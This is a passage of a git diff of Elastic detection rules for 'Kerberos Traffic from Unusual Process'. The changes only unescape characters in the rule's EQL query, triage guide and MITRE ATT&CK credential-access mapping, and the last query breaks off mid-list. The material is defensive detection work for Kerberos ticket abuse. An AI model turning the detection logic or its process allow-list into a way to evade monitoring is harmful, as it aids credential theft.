- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -83,7 +83,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/897dc6b5-b39f-432a-8d75-d3730d50c782_107.json b/packages/security_detection_engine/kibana/security_rule/897dc6b5-b39f-432a-8d75-d3730d50c782_107.json
index 6bd3408824d..c6d6ca91671 100644
--- a/packages/security_detection_engine/kibana/security_rule/897dc6b5-b39f-432a-8d75-d3730d50c782_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/897dc6b5-b39f-432a-8d75-d3730d50c782_107.json
@@ -16,8 +16,8 @@ "language": "eql", "license": "Elastic License v2", "name": "Kerberos Traffic from Unusual Process", - "note": "## Triage and analysis\n\n### Investigating Kerberos Traffic from Unusual Process\n\nKerberos is the default authentication protocol in Active Directory, designed to provide strong authentication for client/server applications by using secret-key cryptography.\n\nDomain-joined hosts usually perform Kerberos traffic using the `lsass.exe` process. This rule detects the occurrence of traffic on the Kerberos port (88) by processes other than `lsass.exe` to detect the unusual request and usage of Kerberos tickets.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check if the Destination IP is related to a Domain Controller.\n- Review event ID 4769 for suspicious ticket requests.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, 
pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This rule uses a Kerberos-related port but does not identify the protocol used on that port. HTTP traffic on a non-standard port or destination IP address unrelated to Domain controllers can create false positives.\n- Exceptions can be added for noisy/frequent connections.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n - Ticket requests can be used to investigate potentially compromised accounts.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", - "query": "network where host.os.type == \"windows\" and event.type == \"start\" and network.direction : (\"outgoing\", \"egress\") and\n destination.port == 88 and source.port \u003e= 49152 and process.pid != 4 and \n not process.executable :\n (\"?:\\\\Windows\\\\System32\\\\lsass.exe\",\n \"System\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Program Files\\\\Puppet Labs\\\\Puppet\\\\puppet\\\\bin\\\\ruby.exe\",\n \"\\\\device\\\\harddiskvolume?\\\\windows\\\\system32\\\\lsass.exe\",\n \"?:\\\\Program Files\\\\rapid7\\\\nexpose\\\\nse\\\\.DLLCACHE\\\\nseserv.exe\",\n \"?:\\\\Program Files (x86)\\\\GFI\\\\LanGuard 12 Agent\\\\lnsscomm.exe\",\n \"?:\\\\Program Files (x86)\\\\SuperScan\\\\scanner.exe\",\n \"?:\\\\Program Files (x86)\\\\Nmap\\\\nmap.exe\",\n \"?:\\\\Program Files\\\\Tenable\\\\Nessus\\\\nessusd.exe\",\n 
\"\\\\device\\\\harddiskvolume?\\\\program files (x86)\\\\nmap\\\\nmap.exe\",\n \"?:\\\\Program Files\\\\Docker\\\\Docker\\\\resources\\\\vpnkit.exe\",\n \"?:\\\\Program Files\\\\Docker\\\\Docker\\\\resources\\\\com.docker.vpnkit.exe\",\n \"?:\\\\Program Files\\\\VMware\\\\VMware View\\\\Server\\\\bin\\\\ws_TomcatService.exe\",\n \"?:\\\\Program Files (x86)\\\\DesktopCentral_Agent\\\\bin\\\\dcpatchscan.exe\",\n \"\\\\device\\\\harddiskvolume?\\\\program files (x86)\\\\nmap oem\\\\nmap.exe\",\n \"?:\\\\Program Files (x86)\\\\Nmap OEM\\\\nmap.exe\",\n \"?:\\\\Program Files (x86)\\\\Zscaler\\\\ZSATunnel\\\\ZSATunnel.exe\",\n \"?:\\\\Program Files\\\\JetBrains\\\\PyCharm Community Edition*\\\\bin\\\\pycharm64.exe\",\n \"?:\\\\Program Files (x86)\\\\Advanced Port Scanner\\\\advanced_port_scanner.exe\",\n \"?:\\\\Program Files (x86)\\\\nwps\\\\NetScanTools Pro\\\\NSTPRO.exe\",\n \"?:\\\\Program Files\\\\BlackBerry\\\\UEM\\\\Proxy Server\\\\bin\\\\prunsrv.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft Silverlight\\\\sllauncher.exe\",\n \"?:\\\\Windows\\\\System32\\\\MicrosoftEdgeCP.exe\",\n \"?:\\\\Windows\\\\SystemApps\\\\Microsoft.MicrosoftEdge_*\\\\MicrosoftEdge.exe\", \n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\MicrosoftEdgeUpdate.exe\",\n \"?:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\", \n \"?:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\", \n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\", \n \"?:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe\", \n \"?:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe\",\n \"?:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe\"\n ) and\n destination.address != \"127.0.0.1\" and destination.address != \"::1\"\n", + "note": "## Triage and analysis\n\n### Investigating Kerberos Traffic from Unusual Process\n\nKerberos is the default authentication protocol in Active Directory, designed to provide strong 
authentication for client/server applications by using secret-key cryptography.\n\nDomain-joined hosts usually perform Kerberos traffic using the `lsass.exe` process. This rule detects the occurrence of traffic on the Kerberos port (88) by processes other than `lsass.exe` to detect the unusual request and usage of Kerberos tickets.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check if the Destination IP is related to a Domain Controller.\n- Review event ID 4769 for suspicious ticket requests.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve 
All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This rule uses a Kerberos-related port but does not identify the protocol used on that port. HTTP traffic on a non-standard port or destination IP address unrelated to Domain controllers can create false positives.\n- Exceptions can be added for noisy/frequent connections.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n - Ticket requests can be used to investigate potentially compromised accounts.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "query": "network where host.os.type == \"windows\" and event.type == \"start\" and network.direction : (\"outgoing\", \"egress\") and\n destination.port == 88 and source.port >= 49152 and process.pid != 4 and \n not process.executable :\n (\"?:\\\\Windows\\\\System32\\\\lsass.exe\",\n \"System\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Program Files\\\\Puppet Labs\\\\Puppet\\\\puppet\\\\bin\\\\ruby.exe\",\n \"\\\\device\\\\harddiskvolume?\\\\windows\\\\system32\\\\lsass.exe\",\n \"?:\\\\Program Files\\\\rapid7\\\\nexpose\\\\nse\\\\.DLLCACHE\\\\nseserv.exe\",\n \"?:\\\\Program Files (x86)\\\\GFI\\\\LanGuard 12 Agent\\\\lnsscomm.exe\",\n \"?:\\\\Program Files (x86)\\\\SuperScan\\\\scanner.exe\",\n \"?:\\\\Program Files (x86)\\\\Nmap\\\\nmap.exe\",\n \"?:\\\\Program Files\\\\Tenable\\\\Nessus\\\\nessusd.exe\",\n 
\"\\\\device\\\\harddiskvolume?\\\\program files (x86)\\\\nmap\\\\nmap.exe\",\n \"?:\\\\Program Files\\\\Docker\\\\Docker\\\\resources\\\\vpnkit.exe\",\n \"?:\\\\Program Files\\\\Docker\\\\Docker\\\\resources\\\\com.docker.vpnkit.exe\",\n \"?:\\\\Program Files\\\\VMware\\\\VMware View\\\\Server\\\\bin\\\\ws_TomcatService.exe\",\n \"?:\\\\Program Files (x86)\\\\DesktopCentral_Agent\\\\bin\\\\dcpatchscan.exe\",\n \"\\\\device\\\\harddiskvolume?\\\\program files (x86)\\\\nmap oem\\\\nmap.exe\",\n \"?:\\\\Program Files (x86)\\\\Nmap OEM\\\\nmap.exe\",\n \"?:\\\\Program Files (x86)\\\\Zscaler\\\\ZSATunnel\\\\ZSATunnel.exe\",\n \"?:\\\\Program Files\\\\JetBrains\\\\PyCharm Community Edition*\\\\bin\\\\pycharm64.exe\",\n \"?:\\\\Program Files (x86)\\\\Advanced Port Scanner\\\\advanced_port_scanner.exe\",\n \"?:\\\\Program Files (x86)\\\\nwps\\\\NetScanTools Pro\\\\NSTPRO.exe\",\n \"?:\\\\Program Files\\\\BlackBerry\\\\UEM\\\\Proxy Server\\\\bin\\\\prunsrv.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft Silverlight\\\\sllauncher.exe\",\n \"?:\\\\Windows\\\\System32\\\\MicrosoftEdgeCP.exe\",\n \"?:\\\\Windows\\\\SystemApps\\\\Microsoft.MicrosoftEdge_*\\\\MicrosoftEdge.exe\", \n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\MicrosoftEdgeUpdate.exe\",\n \"?:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\", \n \"?:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\", \n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\", \n \"?:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe\", \n \"?:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe\",\n \"?:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe\"\n ) and\n destination.address != \"127.0.0.1\" and destination.address != \"::1\"\n", "related_integrations": [ { "package": "endpoint", 
@@ -72,7 +72,7 @@
 ],
 "risk_score": 47,
 "rule_id": "897dc6b5-b39f-432a-8d75-d3730d50c782",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -84,7 +84,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/897dc6b5-b39f-432a-8d75-d3730d50c782_108.json b/packages/security_detection_engine/kibana/security_rule/897dc6b5-b39f-432a-8d75-d3730d50c782_108.json
index 2b7d9d8609e..cedcf38ffbb 100644
--- a/packages/security_detection_engine/kibana/security_rule/897dc6b5-b39f-432a-8d75-d3730d50c782_108.json
+++ b/packages/security_detection_engine/kibana/security_rule/897dc6b5-b39f-432a-8d75-d3730d50c782_108.json
@@ -14,8 +14,8 @@ "language": "eql", "license": "Elastic License v2", "name": "Kerberos Traffic from Unusual Process", - "note": "## Triage and analysis\n\n### Investigating Kerberos Traffic from Unusual Process\n\nKerberos is the default authentication protocol in Active Directory, designed to provide strong authentication for client/server applications by using secret-key cryptography.\n\nDomain-joined hosts usually perform Kerberos traffic using the `lsass.exe` process. This rule detects the occurrence of traffic on the Kerberos port (88) by processes other than `lsass.exe` to detect the unusual request and usage of Kerberos tickets.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check if the Destination IP is related to a Domain Controller.\n- Review event ID 4769 for suspicious ticket requests.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, 
pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This rule uses a Kerberos-related port but does not identify the protocol used on that port. HTTP traffic on a non-standard port or destination IP address unrelated to Domain controllers can create false positives.\n- Exceptions can be added for noisy/frequent connections.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n - Ticket requests can be used to investigate potentially compromised accounts.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", - "query": "network where host.os.type == \"windows\" and event.type == \"start\" and network.direction == \"egress\" and\n destination.port == 88 and source.port \u003e= 49152 and process.pid != 4 and destination.address : \"*\" and\n not \n (\n process.executable : (\n \"\\\\device\\\\harddiskvolume?\\\\program files (x86)\\\\nmap\\\\nmap.exe\",\n \"\\\\device\\\\harddiskvolume?\\\\program files (x86)\\\\nmap oem\\\\nmap.exe\",\n \"\\\\device\\\\harddiskvolume?\\\\windows\\\\system32\\\\lsass.exe\",\n \"?:\\\\Program Files\\\\Amazon Corretto\\\\jdk1*\\\\bin\\\\java.exe\",\n \"?:\\\\Program Files\\\\BlackBerry\\\\UEM\\\\Proxy Server\\\\bin\\\\prunsrv.exe\",\n \"?:\\\\Program Files\\\\BlackBerry\\\\UEM\\\\Core\\\\tomcat-core\\\\bin\\\\tomcat9.exe\",\n \"?:\\\\Program Files\\\\DBeaver\\\\dbeaver.exe\",\n \"?:\\\\Program 
Files\\\\Docker\\\\Docker\\\\resources\\\\com.docker.backend.exe\",\n \"?:\\\\Program Files\\\\Docker\\\\Docker\\\\resources\\\\com.docker.vpnkit.exe\",\n \"?:\\\\Program Files\\\\Docker\\\\Docker\\\\resources\\\\vpnkit.exe\",\n \"?:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe\",\n \"?:\\\\Program Files\\\\JetBrains\\\\PyCharm Community Edition*\\\\bin\\\\pycharm64.exe\",\n \"?:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe\",\n \"?:\\\\Program Files\\\\Oracle\\\\VirtualBox\\\\VirtualBoxVM.exe\",\n \"?:\\\\Program Files\\\\Puppet Labs\\\\Puppet\\\\puppet\\\\bin\\\\ruby.exe\",\n \"?:\\\\Program Files\\\\rapid7\\\\nexpose\\\\nse\\\\.DLLCACHE\\\\nseserv.exe\",\n \"?:\\\\Program Files\\\\Silverfort\\\\Silverfort AD Adapter\\\\SilverfortServer.exe\",\n \"?:\\\\Program Files\\\\Tenable\\\\Nessus\\\\nessusd.exe\",\n \"?:\\\\Program Files\\\\VMware\\\\VMware View\\\\Server\\\\bin\\\\ws_TomcatService.exe\",\n \"?:\\\\Program Files (x86)\\\\Advanced Port Scanner\\\\advanced_port_scanner.exe\",\n \"?:\\\\Program Files (x86)\\\\DesktopCentral_Agent\\\\bin\\\\dcpatchscan.exe\",\n \"?:\\\\Program Files (x86)\\\\GFI\\\\LanGuard 12 Agent\\\\lnsscomm.exe\",\n \"?:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\MicrosoftEdgeUpdate.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft Silverlight\\\\sllauncher.exe\",\n \"?:\\\\Program Files (x86)\\\\Nmap\\\\nmap.exe\",\n \"?:\\\\Program Files (x86)\\\\Nmap OEM\\\\nmap.exe\",\n \"?:\\\\Program Files (x86)\\\\nwps\\\\NetScanTools Pro\\\\NSTPRO.exe\",\n \"?:\\\\Program Files (x86)\\\\SAP BusinessObjects\\\\tomcat\\\\bin\\\\tomcat9.exe\",\n \"?:\\\\Program Files (x86)\\\\SuperScan\\\\scanner.exe\",\n \"?:\\\\Program 
Files (x86)\\\\Zscaler\\\\ZSATunnel\\\\ZSATunnel.exe\",\n \"?:\\\\Windows\\\\System32\\\\lsass.exe\",\n \"?:\\\\Windows\\\\System32\\\\MicrosoftEdgeCP.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\vmnat.exe\",\n \"?:\\\\Windows\\\\SystemApps\\\\Microsoft.MicrosoftEdge_*\\\\MicrosoftEdge.exe\",\n \"System\"\n ) and process.code_signature.trusted == true\n ) and\n destination.address != \"127.0.0.1\" and destination.address != \"::1\"\n",
+ "note": "## Triage and analysis\n\n### Investigating Kerberos Traffic from Unusual Process\n\nKerberos is the default authentication protocol in Active Directory, designed to provide strong authentication for client/server applications by using secret-key cryptography.\n\nDomain-joined hosts usually perform Kerberos traffic using the `lsass.exe` process. This rule detects the occurrence of traffic on the Kerberos port (88) by processes other than `lsass.exe` to detect the unusual request and usage of Kerberos tickets.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check if the Destination IP is related to a Domain Controller.\n- Review event ID 4769 for suspicious ticket requests.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, 
pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This rule uses a Kerberos-related port but does not identify the protocol used on that port. HTTP traffic on a non-standard port or destination IP address unrelated to Domain controllers can create false positives.\n- Exceptions can be added for noisy/frequent connections.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n - Ticket requests can be used to investigate potentially compromised accounts.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n",
+ "query": "network where host.os.type == \"windows\" and event.type == \"start\" and network.direction == \"egress\" and\n destination.port == 88 and source.port >= 49152 and process.pid != 4 and destination.address : \"*\" and\n not \n (\n process.executable : (\n \"\\\\device\\\\harddiskvolume?\\\\program files (x86)\\\\nmap\\\\nmap.exe\",\n \"\\\\device\\\\harddiskvolume?\\\\program files (x86)\\\\nmap oem\\\\nmap.exe\",\n \"\\\\device\\\\harddiskvolume?\\\\windows\\\\system32\\\\lsass.exe\",\n \"?:\\\\Program Files\\\\Amazon Corretto\\\\jdk1*\\\\bin\\\\java.exe\",\n \"?:\\\\Program Files\\\\BlackBerry\\\\UEM\\\\Proxy Server\\\\bin\\\\prunsrv.exe\",\n \"?:\\\\Program Files\\\\BlackBerry\\\\UEM\\\\Core\\\\tomcat-core\\\\bin\\\\tomcat9.exe\",\n \"?:\\\\Program Files\\\\DBeaver\\\\dbeaver.exe\",\n \"?:\\\\Program 
